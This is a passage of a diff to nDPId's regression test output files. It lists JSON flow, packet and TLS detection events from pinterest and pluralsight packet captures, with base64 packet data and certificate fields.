+00677{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289718347,"flow_last_seen":1605289718378,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80c::200a","src_port":57130,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00621{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289718347,"flow_last_seen":1605289718378,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80c::200a","src_port":57130,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00670{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289722442,"flow_last_seen":1605289722621,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2600:1901::7a0b::","src_port":46918,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00614{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289722442,"flow_last_seen":1605289722621,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2600:1901::7a0b::","src_port":46918,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00574{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","packets-captured":17657,"packets-processed":17657,"total-skipped-flows":0,"total-l4-data-len":26490343,"total-not-detected-flows":0,"total-guessed-flows":17,"total-detected-flows":21,"total-detection-updates":31,"total-updates":0,"current-active-flows":0,"total-active-flows":37,"total-idle-flows":37,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":241,"global_ts_msec":1605289734948} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 17657/17657 diff --git a/test/results/pluralsight.pcap.out b/test/results/pluralsight.pcap.out index 0c415f012..92ed5ff92 100644 --- a/test/results/pluralsight.pcap.out +++ b/test/results/pluralsight.pcap.out @@ -1,51 +1,51 @@ 00462{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"pluralsight.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00548{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"pluralsight.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1648373355763} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1648373355763,"flow_last_seen":1648373355763,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1648373355763,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"54.69.188.18","src_port":42642,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1648373355763,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1648373355763,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8t1dAAEAGzuTAqAGANkW8EqaSAbs5mmmUAAAAAKAC+vDIPgAAAgQFtAQCCAqK+PnbAAAAAAEDAwc="} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1648373355952,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1648373355952,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAAOAG5js2RbwSwKgBgAG7ppJ9QO7SOZpplaASaN998gAAAgQFtAQCCApSMR4Hivj52wEDAwg="} -01168{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1648373355952,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1648373355952,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5t1lAAEAGzOXAqAGANkW8EqaSAbs5mmmVfUDu04AYAfbrKAAAAQEICor4+pdSMR4HFgMBAgABAAH8AwM1jCFDKADpkwCWNDdgH\/adXVGzDgYuQsQMuim+6yCdjCAuElAWaAcNbYd22pDJpusrU2oMuj5gm\/t2Aky6e512VAAgamoTARMCEwPAK8AvwCzAMMypzKjAE8AUAJwAnQAvADUBAAGTSkoAAAAAABQAEgAAD3BsdXJhbHNpZ2h0LmNvbQAXAAD\/AQABAAAKAAoACCoqAB0AFwAYAAsAAgEAACMAAAAQAA4ADAJoMghodHRwLzEuMQAFAAUBAAAAAAANABIAEAQDCAQEAQUDCAUFAQgGBgEAEgAAADMAKwApKioAAQAAHQAgy0tnman9YKIJBU2tFJ\/X+H4+8C285s8hNvU9rt60YmAALQACAQEAKwAHBgoKAwQDAwAbAAMCAAJEaQAFAAMCaDJqagABAAAVAMgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00904{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1648373355763,"flow_last_seen":1648373355952,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1648373355952,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"54.69.188.18","src_port":42642,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pluralsight.com","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2"}} -00960{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":4,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1648373355763,"flow_last_seen":1648373356139,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1648373356139,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"54.69.188.18","src_port":42642,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pluralsight.com","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"8d2a028aa94425f76ced7826b1f39039","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2"}} -01308{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":7,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1648373355763,"flow_last_seen":1648373356139,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":6107,"flow_avg_l4_payload_len":872,"midstream":0,"thread_ts_msec":1648373356139,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"54.69.188.18","src_port":42642,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pluralsight.com","server_names":"*.pluralsight.com,pluralsight.com","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"8d2a028aa94425f76ced7826b1f39039","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=Arizona, L=Scottsdale, O=GoDaddy.com, Inc., OU=http:\/\/certs.godaddy.com\/repository\/, CN=Go Daddy Secure Certificate Authority - G2","subjectDN":"OU=Domain Control Validated, CN=*.pluralsight.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2","fingerprint":"31:0B:3D:03:7A:6A:F8:86:8F:CE:62:30:E9:A2:F1:47:E5:6C:3D:F7"}} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":10,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1648373357854,"flow_last_seen":1648373357854,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1648373357854,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"146.75.62.208","src_port":42782,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1648373357854,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1648373357854,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8tRVAAEAG8mLAqAGAkks+0KceAbt\/83TdAAAAAKAC+vCjygAAAgQFtAQCCAquLcooAAAAAAEDAwc="} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":11,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1648373357861,"flow_last_seen":1648373357861,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1648373357861,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"146.75.62.208","src_port":42790,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1648373357861,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1648373357861,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA85z1AAEAGwDrAqAGAkks+0KcmAbuYBq2TAAAAAKAC+vBS8wAAAgQFtAQCCAquLcouAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1648373357870,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1648373357870,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADkGrniSSz7QwKgBgAG7px6MpPZof\/N03qAS\/\/\/QggAAAgQFTAQCCApC6QiXri3KKAEDAwk="} -01170{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1648373357870,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1648373357870,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5tRdAAEAG8GPAqAGAkks+0KceAbt\/83TejKT2aYAYAfY+HwAAAQEICq4tyjdC6QiXFgMBAgABAAH8AwNByQDZoxI4dOK0Sqz8YqFtpt\/EgjJNogy+qC4qHtET5yBBjqjV\/zD\/ZZYcaXw3kK2L11Av5ASkLtB9CBYWZu3HRgAg2toTARMCEwPAK8AvwCzAMMypzKjAE8AUAJwAnQAvADUBAAGTGhoAAAAAABsAGQAAFnBsdXJhbHNpZ2h0Mi5pbWdpeC5uZXQAFwAA\/wEAAQAACgAKAAh6egAdABcAGAALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAADQASABAEAwgEBAEFAwgFBQEIBgYBABIAAAAzACsAKXp6AAEAAB0AICyryrnXcbLoAjfLxc89+emszCPBlJNQz9WtPrwFSKZoAC0AAgEBACsABwZ6egMEAwMAGwADAgACRGkABQADAmgySkoAAQAAFQDBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00913{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1648373357854,"flow_last_seen":1648373357870,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1648373357870,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"146.75.62.208","src_port":42782,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pluralsight2.imgix.net","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2"}} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1648373357879,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1648373357879,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADkGrniSSz7QwKgBgAG7pyYtR\/VLmAatlKAS\/\/8fEgAAAgQFTAQCCAr1hBcPri3KLgEDAwk="} -01167{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1648373357879,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1648373357879,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI55z9AAEAGvjvAqAGAkks+0KcmAbuYBq2ULUf1TIAYAfb0QgAAAQEICq4tykD1hBcPFgMBAgABAAH8AwMVCkjcl1ldHYszMMhbvCrBmyAv89Ky2j4DTP7XcUyMOSBZfmcNBQmySrBYu\/Xc6jDaJEswZCfnt+SXnGDnGRc5VwAgCgoTARMCEwPAK8AvwCzAMMypzKjAE8AUAJwAnQAvADUBAAGTSkoAAAAAABoAGAAAFXBsdXJhbHNpZ2h0LmltZ2l4Lm5ldAAXAAD\/AQABAAAKAAoACBoaAB0AFwAYAAsAAgEAACMAAAAQAA4ADAJoMghodHRwLzEuMQAFAAUBAAAAAAANABIAEAQDCAQEAQUDCAUFAQgGBgEAEgAAADMAKwApGhoAAQAAHQAgibFRT+4ffFiWVzdt9+CHYgJvYueRYWReY4H44PP66lMALQACAQEAKwAHBurqAwQDAwAbAAMCAAJEaQAFAAMCaDJaWgABAAAVAMIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00912{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1648373357861,"flow_last_seen":1648373357879,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1648373357879,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"146.75.62.208","src_port":42790,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pluralsight.imgix.net","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2"}} -00969{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1648373357854,"flow_last_seen":1648373357887,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1340,"flow_tot_l4_payload_len":1857,"flow_avg_l4_payload_len":464,"midstream":0,"thread_ts_msec":1648373357887,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"146.75.62.208","src_port":42782,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pluralsight2.imgix.net","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2"}} -01212{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":18,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1648373357854,"flow_last_seen":1648373357887,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1340,"flow_tot_l4_payload_len":4537,"flow_avg_l4_payload_len":756,"midstream":0,"thread_ts_msec":1648373357887,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"146.75.62.208","src_port":42782,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pluralsight2.imgix.net","server_names":"*.imgix.com,*.imgix.net,imgix.com,imgix.net","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=BE, O=GlobalSign nv-sa, CN=GlobalSign Atlas R3 DV TLS CA 2020","subjectDN":"CN=*.imgix.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2","fingerprint":"C6:A8:D1:F3:16:08:C6:7F:9F:58:B9:3B:87:A6:A1:75:BC:67:F8:8D"}} -00968{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":21,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1648373357861,"flow_last_seen":1648373357901,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1340,"flow_tot_l4_payload_len":1857,"flow_avg_l4_payload_len":464,"midstream":0,"thread_ts_msec":1648373357901,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"146.75.62.208","src_port":42790,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pluralsight.imgix.net","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2"}} -01211{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":23,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1648373357861,"flow_last_seen":1648373357901,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1340,"flow_tot_l4_payload_len":4537,"flow_avg_l4_payload_len":756,"midstream":0,"thread_ts_msec":1648373357901,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"146.75.62.208","src_port":42790,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pluralsight.imgix.net","server_names":"*.imgix.com,*.imgix.net,imgix.com,imgix.net","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=BE, O=GlobalSign nv-sa, CN=GlobalSign Atlas R3 DV TLS CA 2020","subjectDN":"CN=*.imgix.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2","fingerprint":"C6:A8:D1:F3:16:08:C6:7F:9F:58:B9:3B:87:A6:A1:75:BC:67:F8:8D"}} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":28,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1648373358908,"flow_last_seen":1648373358908,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1648373358908,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"18.203.201.56","src_port":42618,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1648373358908,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1648373358908,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8pPxAAEAG95PAqAGAEsvJOKZ6AbsXjcxKAAAAAKAC+vDGJwAAAgQFtAQCCAq7LqF\/AAAAAAEDAwc="} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1648373358948,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1648373358948,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAAOUG948Sy8k4wKgBgAG7pnpgCgHJF43MS6ASaN+FjQAAAgQFtAQCCAqVXttnuy6hfwEDAwg="} -01170{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1648373358949,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1648373358949,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5pP5AAEAG9ZTAqAGAEsvJOKZ6AbsXjcxLYAoByoAYAfahVQAAAQEICrsuoaiVXttnFgMBAgABAAH8AwPQaIxCQafGfU7U68BjTWz12bgC7rPMRDrwBcYKkg2BtiCsXEdEYhfEEMAlvDmVmL\/9\/3dvAf\/ZUZkvazPc8sBEAwAg6uoTARMCEwPAK8AvwCzAMMypzKjAE8AUAJwAnQAvADUBAAGTenoAAAAAABgAFgAAE3N0dC5wbHVyYWxzaWdodC5jb20AFwAA\/wEAAQAACgAKAAhaWgAdABcAGAALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAADQASABAEAwgEBAEFAwgFBQEIBgYBABIAAAAzACsAKVpaAAEAAB0AIC1NIbYz00S\/PDWD2znXWT+4vqGbUzfdyPQt1wB6uPFJAC0AAgEBACsABwb6+gMEAwMAGwADAgACRGkABQADAmgyuroAAQAAFQDEAAA